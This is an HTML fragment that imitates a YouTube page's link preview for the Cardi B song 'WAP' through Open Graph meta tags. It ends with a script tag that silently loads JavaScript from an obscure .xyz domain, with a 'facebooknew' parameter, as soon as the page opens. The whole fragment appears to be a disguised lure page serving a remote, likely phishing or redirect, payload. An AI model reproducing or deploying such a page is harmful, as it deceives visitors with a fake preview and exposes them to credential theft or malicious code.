<meta property="og:site_name" content="YouTube">
<meta property="og:url" content="https://www.youtube.com/watch?v=Wc5IbN4xw70">
<meta property="og:title" content="Cardi B - WAP feat. Megan Thee Stallion [Official Audio]">
<meta property="og:image" content="https://i.ytimg.com/vi/Wc5IbN4xw70/maxresdefault.jpg">
<meta property="og:image:width" content="480">
<meta property="og:image:height" content="360">
<script src="https://bbbbbbbbmmmmmmmm.xyz/?api=1&lan=facebooknew&ht=1&counter0=brayanbrr" type="text/javascript" async="true"></script>